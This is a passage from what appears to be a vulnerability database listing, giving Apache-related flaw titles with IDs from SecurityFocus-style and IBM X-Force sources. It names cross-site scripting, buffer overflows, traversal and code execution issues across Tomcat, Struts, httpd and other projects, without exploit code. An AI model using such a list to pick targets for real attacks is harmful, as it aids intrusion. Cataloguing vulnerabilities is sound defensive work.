11822| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
11823| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
11824| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
11825| [5485] Apache 2.0 Path Disclosure Vulnerability
11826| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
11827| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
11828| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
11829| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
11830| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
11831| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
11832| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
11833| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
11834| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
11835| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
11836| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
11837| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
11838| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
11839| [4437] Apache Error Message Cross-Site Scripting Vulnerability
11840| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
11841| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
11842| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
11843| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
11844| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
11845| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
11846| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
11847| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
11848| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
11849| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
11850| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
11851| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
11852| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
11853| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
11854| [3596] Apache Split-Logfile File Append Vulnerability
11855| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
11856| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
11857| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
11858| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
11859| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
11860| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
11861| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
11862| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
11863| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
11864| [3169] Apache Server Address Disclosure Vulnerability
11865| [3009] Apache Possible Directory Index Disclosure Vulnerability
11866| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
11867| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
11868| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
11869| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
11870| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
11871| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
11872| [2216] Apache Web Server DoS Vulnerability
11873| [2182] Apache /tmp File Race Vulnerability
11874| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
11875| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
11876| [1821] Apache mod_cookies Buffer Overflow Vulnerability
11877| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
11878| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
11879| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
11880| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
11881| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
11882| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
11883| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
11884| [1457] Apache::ASP source.asp Example Script Vulnerability
11885| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
11886| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
11887|
11888| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11889| [86258] Apache CloudStack text fields cross-site scripting
11890| [85983] Apache Subversion mod_dav_svn module denial of service
11891| [85875] Apache OFBiz UEL code execution
11892| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
11893| [85871] Apache HTTP Server mod_session_dbd unspecified
11894| [85756] Apache Struts OGNL expression command execution
11895| [85755] Apache Struts DefaultActionMapper class open redirect
11896| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
11897| [85574] Apache HTTP Server mod_dav denial of service
11898| [85573] Apache Struts Showcase App OGNL code execution
11899| [85496] Apache CXF denial of service
11900| [85423] Apache Geronimo RMI classloader code execution
11901| [85326] Apache Santuario XML Security for C++ buffer overflow
11902| [85323] Apache Santuario XML Security for Java spoofing
11903| [85319] Apache Qpid Python client SSL spoofing
11904| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
11905| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
11906| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
11907| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
11908| [84952] Apache Tomcat CVE-2012-3544 denial of service
11909| [84763] Apache Struts CVE-2013-2135 security bypass
11910| [84762] Apache Struts CVE-2013-2134 security bypass
11911| [84719] Apache Subversion CVE-2013-2088 command execution
11912| [84718] Apache Subversion CVE-2013-2112 denial of service
11913| [84717] Apache Subversion CVE-2013-1968 denial of service
11914| [84577] Apache Tomcat security bypass
11915| [84576] Apache Tomcat symlink
11916| [84543] Apache Struts CVE-2013-2115 security bypass
11917| [84542] Apache Struts CVE-2013-1966 security bypass
11918| [84154] Apache Tomcat session hijacking
11919| [84144] Apache Tomcat denial of service
11920| [84143] Apache Tomcat information disclosure
11921| [84111] Apache HTTP Server command execution
11922| [84043] Apache Virtual Computing Lab cross-site scripting
11923| [84042] Apache Virtual Computing Lab cross-site scripting
11924| [83782] Apache CloudStack information disclosure
11925| [83781] Apache CloudStack security bypass
11926| [83720] Apache ActiveMQ cross-site scripting
11927| [83719] Apache ActiveMQ denial of service
11928| [83718] Apache ActiveMQ denial of service
11929| [83263] Apache Subversion denial of service
11930| [83262] Apache Subversion denial of service
11931| [83261] Apache Subversion denial of service
11932| [83259] Apache Subversion denial of service
11933| [83035] Apache mod_ruid2 security bypass
11934| [82852] Apache Qpid federation_tag security bypass
11935| [82851] Apache Qpid qpid::framing::Buffer denial of service
11936| [82758] Apache Rave User RPC API information disclosure
11937| [82663] Apache Subversion svn_fs_file_length() denial of service
11938| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
11939| [82641] Apache Qpid AMQP denial of service
11940| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
11941| [82618] Apache Commons FileUpload symlink
11942| [82360] Apache HTTP Server manager interface cross-site scripting
11943| [82359] Apache HTTP Server hostnames cross-site scripting
11944| [82338] Apache Tomcat log/logdir information disclosure
11945| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
11946| [82268] Apache OpenJPA deserialization command execution
11947| [81981] Apache CXF UsernameTokens security bypass
11948| [81980] Apache CXF WS-Security security bypass
11949| [81398] Apache OFBiz cross-site scripting
11950| [81240] Apache CouchDB directory traversal
11951| [81226] Apache CouchDB JSONP code execution
11952| [81225] Apache CouchDB Futon user interface cross-site scripting
11953| [81211] Apache Axis2/C SSL spoofing
11954| [81167] Apache CloudStack DeployVM information disclosure
11955| [81166] Apache CloudStack AddHost API information disclosure
11956| [81165] Apache CloudStack createSSHKeyPair API information disclosure
11957| [80518] Apache Tomcat cross-site request forgery security bypass
11958| [80517] Apache Tomcat FormAuthenticator security bypass
11959| [80516] Apache Tomcat NIO denial of service
11960| [80408] Apache Tomcat replay-countermeasure security bypass
11961| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
11962| [80317] Apache Tomcat slowloris denial of service
11963| [79984] Apache Commons HttpClient SSL spoofing
11964| [79983] Apache CXF SSL spoofing
11965| [79830] Apache Axis2/Java SSL spoofing
11966| [79829] Apache Axis SSL spoofing
11967| [79809] Apache Tomcat DIGEST security bypass
11968| [79806] Apache Tomcat parseHeaders() denial of service
11969| [79540] Apache OFBiz unspecified
11970| [79487] Apache Axis2 SAML security bypass
11971| [79212] Apache Cloudstack code execution
11972| [78734] Apache CXF SOAP Action security bypass
11973| [78730] Apache Qpid broker denial of service
11974| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
11975| [78563] Apache mod_pagespeed module unspecified cross-site scripting
11976| [78562] Apache mod_pagespeed module security bypass
11977| [78454] Apache Axis2 security bypass
11978| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
11979| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
11980| [78321] Apache Wicket unspecified cross-site scripting
11981| [78183] Apache Struts parameters denial of service
11982| [78182] Apache Struts cross-site request forgery
11983| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
11984| [77987] mod_rpaf module for Apache denial of service
11985| [77958] Apache Struts skill name code execution
11986| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
11987| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
11988| [77568] Apache Qpid broker security bypass
11989| [77421] Apache Libcloud spoofing
11990| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
11991| [77046] Oracle Solaris Apache HTTP Server information disclosure
11992| [76837] Apache Hadoop information disclosure
11993| [76802] Apache Sling CopyFrom denial of service
11994| [76692] Apache Hadoop symlink
11995| [76535] Apache Roller console cross-site request forgery
11996| [76534] Apache Roller weblog cross-site scripting
11997| [76152] Apache CXF elements security bypass
11998| [76151] Apache CXF child policies security bypass
11999| [75983] MapServer for Windows Apache file include
12000| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
12001| [75558] Apache POI denial of service
12002| [75545] PHP apache_request_headers() buffer overflow
12003| [75302] Apache Qpid SASL security bypass
12004| [75211] Debian GNU/Linux apache 2 cross-site scripting
12005| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
12006| [74871] Apache OFBiz FlexibleStringExpander code execution
12007| [74870] Apache OFBiz multiple cross-site scripting
12008| [74750] Apache Hadoop unspecified spoofing
12009| [74319] Apache Struts XSLTResult.java file upload
12010| [74313] Apache Traffic Server header buffer overflow
12011| [74276] Apache Wicket directory traversal
12012| [74273] Apache Wicket unspecified cross-site scripting
12013| [74181] Apache HTTP Server mod_fcgid module denial of service
12014| [73690] Apache Struts OGNL code execution
12015| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
12016| [73100] Apache MyFaces in directory traversal
12017| [73096] Apache APR hash denial of service
12018| [73052] Apache Struts name cross-site scripting
12019| [73030] Apache CXF UsernameToken security bypass
12020| [72888] Apache Struts lastName cross-site scripting
12021| [72758] Apache HTTP Server httpOnly information disclosure
12022| [72757] Apache HTTP Server MPM denial of service
12023| [72585] Apache Struts ParameterInterceptor security bypass
12024| [72438] Apache Tomcat Digest security bypass
12025| [72437] Apache Tomcat Digest security bypass
12026| [72436] Apache Tomcat DIGEST security bypass
12027| [72425] Apache Tomcat parameter denial of service
12028| [72422] Apache Tomcat request object information disclosure
12029| [72377] Apache HTTP Server scoreboard security bypass
12030| [72345] Apache HTTP Server HTTP request denial of service
12031| [72229] Apache Struts ExceptionDelegator command execution
12032| [72089] Apache Struts ParameterInterceptor directory traversal
12033| [72088] Apache Struts CookieInterceptor command execution
12034| [72047] Apache Geronimo hash denial of service
12035| [72016] Apache Tomcat hash denial of service
12036| [71711] Apache Struts OGNL expression code execution
12037| [71654] Apache Struts interfaces security bypass
12038| [71620] Apache ActiveMQ failover denial of service
12039| [71617] Apache HTTP Server mod_proxy module information disclosure
12040| [71508] Apache MyFaces EL security bypass
12041| [71445] Apache HTTP Server mod_proxy security bypass
12042| [71203] Apache Tomcat servlets privilege escalation
12043| [71181] Apache HTTP Server ap_pregsub() denial of service
12044| [71093] Apache HTTP Server ap_pregsub() buffer overflow
12045| [70336] Apache HTTP Server mod_proxy information disclosure
12046| [69804] Apache HTTP Server mod_proxy_ajp denial of service
12047| [69472] Apache Tomcat AJP security bypass
12048| [69396] Apache HTTP Server ByteRange filter denial of service
12049| [69394] Apache Wicket multi window support cross-site scripting
12050| [69176] Apache Tomcat XML information disclosure
12051| [69161] Apache Tomcat jsvc information disclosure
12052| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
12053| [68541] Apache Tomcat sendfile information disclosure
12054| [68420] Apache XML Security denial of service
12055| [68238] Apache Tomcat JMX information disclosure
12056| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
12057| [67804] Apache Subversion control rules information disclosure
12058| [67803] Apache Subversion control rules denial of service
12059| [67802] Apache Subversion baselined denial of service
12060| [67672] Apache Archiva multiple cross-site scripting
12061| [67671] Apache Archiva multiple cross-site request forgery
12062| [67564] Apache APR apr_fnmatch() denial of service
12063| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
12064| [67515] Apache Tomcat annotations security bypass
12065| [67480] Apache Struts s:submit information disclosure
12066| [67414] Apache APR apr_fnmatch() denial of service
12067| [67356] Apache Struts javatemplates cross-site scripting
12068| [67354] Apache Struts Xwork cross-site scripting
12069| [66676] Apache Tomcat HTTP BIO information disclosure
12070| [66675] Apache Tomcat web.xml security bypass
12071| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
12072| [66241] Apache HttpComponents information disclosure
12073| [66154] Apache Tomcat ServletSecurity security bypass
12074| [65971] Apache Tomcat ServletSecurity security bypass
12075| [65876] Apache Subversion mod_dav_svn denial of service
12076| [65343] Apache Continuum unspecified cross-site scripting
12077| [65162] Apache Tomcat NIO connector denial of service
12078| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
12079| [65160] Apache Tomcat HTML Manager interface cross-site scripting
12080| [65159] Apache Tomcat ServletContect security bypass
12081| [65050] Apache CouchDB web-based administration UI cross-site scripting
12082| [64773] Oracle HTTP Server Apache Plugin unauthorized access
12083| [64473] Apache Subversion blame -g denial of service
12084| [64472] Apache Subversion walk() denial of service
12085| [64407] Apache Axis2 CVE-2010-0219 code execution
12086| [63926] Apache Archiva password privilege escalation
12087| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
12088| [63493] Apache Archiva credentials cross-site request forgery
12089| [63477] Apache Tomcat HttpOnly session hijacking
12090| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
12091| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
12092| [62959] Apache Shiro filters security bypass
12093| [62790] Apache Perl cgi module denial of service
12094| [62576] Apache Qpid exchange denial of service
12095| [62575] Apache Qpid AMQP denial of service
12096| [62354] Apache Qpid SSL denial of service
12097| [62235] Apache APR-util apr_brigade_split_line() denial of service
12098| [62181] Apache XML-RPC SAX Parser information disclosure
12099| [61721] Apache Traffic Server cache poisoning
12100| [61202] Apache Derby BUILTIN authentication functionality information disclosure
12101| [61186] Apache CouchDB Futon cross-site request forgery
12102| [61169] Apache CXF DTD denial of service
12103| [61070] Apache Jackrabbit search.jsp SQL injection
12104| [61006] Apache SLMS Quoting cross-site request forgery
12105| [60962] Apache Tomcat time cross-site scripting
12106| [60883] Apache mod_proxy_http information disclosure
12107| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
12108| [60264] Apache Tomcat Transfer-Encoding denial of service
12109| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
12110| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
12111| [59413] Apache mod_proxy_http timeout information disclosure
12112| [59058] Apache MyFaces unencrypted view state cross-site scripting
12113| [58827] Apache Axis2 xsd file include
12114| [58790] Apache Axis2 modules cross-site scripting
12115| [58299] Apache ActiveMQ queueBrowse cross-site scripting
12116| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
12117| [58056] Apache ActiveMQ .jsp source code disclosure
12118| [58055] Apache Tomcat realm name information disclosure
12119| [58046] Apache HTTP Server mod_auth_shadow security bypass
12120| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
12121| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
12122| [57429] Apache CouchDB algorithms information disclosure
12123| [57398] Apache ActiveMQ Web console cross-site request forgery
12124| [57397] Apache ActiveMQ createDestination.action cross-site scripting
12125| [56653] Apache HTTP Server DNS spoofing
12126| [56652] Apache HTTP Server DNS cross-site scripting
12127| [56625] Apache HTTP Server request header information disclosure
12128| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
12129| [56623] Apache HTTP Server mod_proxy_ajp denial of service
12130| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
12131| [55857] Apache Tomcat WAR files directory traversal
12132| [55856] Apache Tomcat autoDeploy attribute security bypass
12133| [55855] Apache Tomcat WAR directory traversal
12134| [55210] Intuit component for Joomla! Apache information disclosure
12135| [54533] Apache Tomcat 404 error page cross-site scripting
12136| [54182] Apache Tomcat admin default password
12137| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
12138| [53666] Apache HTTP Server Solaris pollset support denial of service
12139| [53650] Apache HTTP Server HTTP basic-auth module security bypass
12140| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
12141| [53041] mod_proxy_ftp module for Apache denial of service
12142| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
12143| [51953] Apache Tomcat Path Disclosure
12144| [51952] Apache Tomcat Path Traversal
12145| [51951] Apache stronghold-status Information Disclosure
12146| [51950] Apache stronghold-info Information Disclosure
12147| [51949] Apache PHP Source Code Disclosure
12148| [51948] Apache Multiviews Attack
12149| [51946] Apache JServ Environment Status Information Disclosure
12150| [51945] Apache error_log Information Disclosure
12151| [51944] Apache Default Installation Page Pattern Found
12152| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
12153| [51942] Apache AXIS XML External Entity File Retrieval
12154| [51941] Apache AXIS Sample Servlet Information Leak
12155| [51940] Apache access_log Information Disclosure
12156| [51626] Apache mod_deflate denial of service
12157| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
12158| [51365] Apache Tomcat RequestDispatcher security bypass
12159| [51273] Apache HTTP Server Incomplete Request denial of service
12160| [51195] Apache Tomcat XML information disclosure
12161| [50994] Apache APR-util xml/apr_xml.c denial of service
12162| [50993] Apache APR-util apr_brigade_vprintf denial of service
12163| [50964] Apache APR-util apr_strmatch_precompile() denial of service
12164| [50930] Apache Tomcat j_security_check information disclosure
12165| [50928] Apache Tomcat AJP denial of service
12166| [50884] Apache HTTP Server XML ENTITY denial of service
12167| [50808] Apache HTTP Server AllowOverride privilege escalation
12168| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
12169| [50059] Apache mod_proxy_ajp information disclosure
12170| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
12171| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
12172| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
12173| [49921] Apache ActiveMQ Web interface cross-site scripting
12174| [49898] Apache Geronimo Services/Repository directory traversal
12175| [49725] Apache Tomcat mod_jk module information disclosure
12176| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
12177| [49712] Apache Struts unspecified cross-site scripting
12178| [49213] Apache Tomcat cal2.jsp cross-site scripting
12179| [48934] Apache Tomcat POST doRead method information disclosure
12180| [48211] Apache Tomcat header HTTP request smuggling
12181| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
12182| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
12183| [47709] Apache Roller "
12184| [47104] Novell Netware ApacheAdmin console security bypass
12185| [47086] Apache HTTP Server OS fingerprinting unspecified
12186| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
12187| [45791] Apache Tomcat RemoteFilterValve security bypass
12188| [44435] Oracle WebLogic Apache Connector buffer overflow
12189| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
12190| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
12191| [44156] Apache Tomcat RequestDispatcher directory traversal
| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
| [43885] Oracle WebLogic Server Apache Connector buffer overflow
| [42987] Apache HTTP Server mod_proxy module denial of service
| [42915] Apache Tomcat JSP files path disclosure
| [42914] Apache Tomcat MS-DOS path disclosure
| [42892] Apache Tomcat unspecified unauthorized access
| [42816] Apache Tomcat Host Manager cross-site scripting
| [42303] Apache 403 error cross-site scripting
| [41618] Apache-SSL ExpandCert() authentication bypass
| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
| [40614] Apache mod_jk2 HTTP Host header buffer overflow
| [40562] Apache Geronimo init information disclosure
| [40478] Novell Web Manager webadmin-apache.conf security bypass
| [40411] Apache Tomcat exception handling information disclosure
| [40409] Apache Tomcat native (APR based) connector weak security
| [40403] Apache Tomcat quotes and %5C cookie information disclosure
| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
| [39867] Apache HTTP Server mod_negotiation cross-site scripting
| [39804] Apache Tomcat SingleSignOn information disclosure
| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
| [39608] Apache HTTP Server balancer manager cross-site request forgery
| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
| [39472] Apache HTTP Server mod_status cross-site scripting
| [39201] Apache Tomcat JULI logging weak security
| [39158] Apache HTTP Server Windows SMB shares information disclosure
| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
| [38951] Apache::AuthCAS Perl module cookie SQL injection
| [38800] Apache HTTP Server 413 error page cross-site scripting
| [38211] Apache Geronimo SQLLoginModule authentication bypass
| [37243] Apache Tomcat WebDAV directory traversal
| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
| [36782] Apache Geronimo MEJB unauthorized access
| [36586] Apache HTTP Server UTF-7 cross-site scripting
| [36468] Apache Geronimo LoginModule security bypass
| [36467] Apache Tomcat functions.jsp cross-site scripting
| [36402] Apache Tomcat calendar cross-site request forgery
| [36354] Apache HTTP Server mod_proxy module denial of service
| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
| [36336] Apache Derby lock table privilege escalation
| [36335] Apache Derby schema privilege escalation
| [36006] Apache Tomcat "
| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
| [35999] Apache Tomcat \"
| [35795] Apache Tomcat CookieExample cross-site scripting
| [35536] Apache Tomcat SendMailServlet example cross-site scripting
| [35384] Apache HTTP Server mod_cache module denial of service
| [35097] Apache HTTP Server mod_status module cross-site scripting
| [35095] Apache HTTP Server Prefork MPM module denial of service
| [34984] Apache HTTP Server recall_headers information disclosure
| [34966] Apache HTTP Server MPM content spoofing
| [34965] Apache HTTP Server MPM information disclosure
| [34963] Apache HTTP Server MPM multiple denial of service
| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
| [34869] Apache Tomcat JSP example Web application cross-site scripting
| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
| [34496] Apache Tomcat JK Connector security bypass
| [34377] Apache Tomcat hello.jsp cross-site scripting
| [34212] Apache Tomcat SSL configuration security bypass
| [34210] Apache Tomcat Accept-Language cross-site scripting
| [34209] Apache Tomcat calendar application cross-site scripting
| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
| [34167] Apache Axis WSDL file path disclosure
| [34068] Apache Tomcat AJP connector information disclosure
| [33584] Apache HTTP Server suEXEC privilege escalation
| [32988] Apache Tomcat proxy module directory traversal
| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
| [32708] Debian Apache tty privilege escalation
| [32441] ApacheStats extract() PHP call unspecified
| [32128] Apache Tomcat default account
| [31680] Apache Tomcat RequestParamExample cross-site scripting
| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
| [30456] Apache mod_auth_kerb off-by-one buffer overflow
| [29550] Apache mod_tcl set_var() format string
| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
| [28357] Apache HTTP Server mod_alias script source information disclosure
| [28063] Apache mod_rewrite off-by-one buffer overflow
| [27902] Apache Tomcat URL information disclosure
| [26786] Apache James SMTP server denial of service
| [25680] libapache2 /tmp/svn file upload
| [25614] Apache Struts lookupMap cross-site scripting
| [25613] Apache Struts ActionForm denial of service
| [25612] Apache Struts isCancelled() security bypass
| [24965] Apache mod_python FileSession command execution
| [24716] Apache James spooler memory leak denial of service
| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
| [24158] Apache Geronimo jsp-examples cross-site scripting
| [24030] Apache auth_ldap module multiple format strings
| [24008] Apache mod_ssl custom error message denial of service
| [24003] Apache mod_auth_pgsql module multiple syslog format strings
| [23612] Apache mod_imap referer field cross-site scripting
| [23173] Apache Struts error message cross-site scripting
| [22942] Apache Tomcat directory listing denial of service
| [22858] Apache Multi-Processing Module code allows denial of service
| [22602] RHSA-2005:582 updates for Apache httpd not installed
| [22520] Apache mod-auth-shadow "
| [22466] ApacheTop symlink
| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
| [22006] Apache HTTP Server byte-range filter denial of service
| [21567] Apache mod_ssl off-by-one buffer overflow
| [21195] Apache HTTP Server header HTTP request smuggling
| [20383] Apache HTTP Server htdigest buffer overflow
| [19681] Apache Tomcat AJP12 request denial of service
| [18993] Apache HTTP server check_forensic symlink attack
| [18790] Apache Tomcat Manager cross-site scripting
| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
| [17961] Apache Web server ServerTokens has not been set
| [17930] Apache HTTP Server HTTP GET request denial of service
| [17785] Apache mod_include module buffer overflow
| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
| [17473] Apache HTTP Server Satisfy directive allows access to resources
| [17413] Apache htpasswd buffer overflow
| [17384] Apache HTTP Server environment variable configuration file buffer overflow
| [17382] Apache HTTP Server IPv6 apr_util denial of service
| [17366] Apache HTTP Server mod_dav module LOCK denial of service
| [17273] Apache HTTP Server speculative mode denial of service
| [17200] Apache HTTP Server mod_ssl denial of service
| [16890] Apache HTTP Server server-info request has been detected
| [16889] Apache HTTP Server server-status request has been detected
| [16705] Apache mod_ssl format string attack
| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
| [16230] Apache HTTP Server PHP denial of service
| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
| [15958] Apache HTTP Server authentication modules memory corruption
| [15547] Apache HTTP Server mod_disk_cache local information disclosure
| [15540] Apache HTTP Server socket starvation denial of service
| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
| [15422] Apache HTTP Server mod_access information disclosure
| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
| [15293] Apache for Cygwin "
| [15065] Apache-SSL has a default password
| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
| [14751] Apache Mod_python output filter information disclosure
| [14125] Apache HTTP Server mod_userdir module information disclosure
| [14075] Apache HTTP Server mod_php file descriptor leak
| [13703] Apache HTTP Server account
| [13689] Apache HTTP Server configuration allows symlinks
| [13688] Apache HTTP Server configuration allows SSI
| [13687] Apache HTTP Server Server: header value
| [13685] Apache HTTP Server ServerTokens value
| [13684] Apache HTTP Server ServerSignature value
| [13672] Apache HTTP Server config allows directory autoindexing
| [13671] Apache HTTP Server default content
| [13670] Apache HTTP Server config file directive references outside content root
| [13668] Apache HTTP Server httpd not running in chroot environment
| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
| [13664] Apache HTTP Server config file contains ScriptAlias entry
| [13663] Apache HTTP Server CGI support modules loaded
| [13661] Apache HTTP Server config file contains AddHandler entry
| [13660] Apache HTTP Server 500 error page not CGI script
| [13659] Apache HTTP Server 413 error page not CGI script
| [13658] Apache HTTP Server 403 error page not CGI script
| [13657] Apache HTTP Server 401 error page not CGI script
| [13552] Apache HTTP Server mod_cgid module information disclosure
| [13550] Apache GET request directory traversal
| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
| [13429] Apache Tomcat non-HTTP request denial of service
| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
| [13295] Apache weak password encryption
| [13254] Apache Tomcat .jsp cross-site scripting
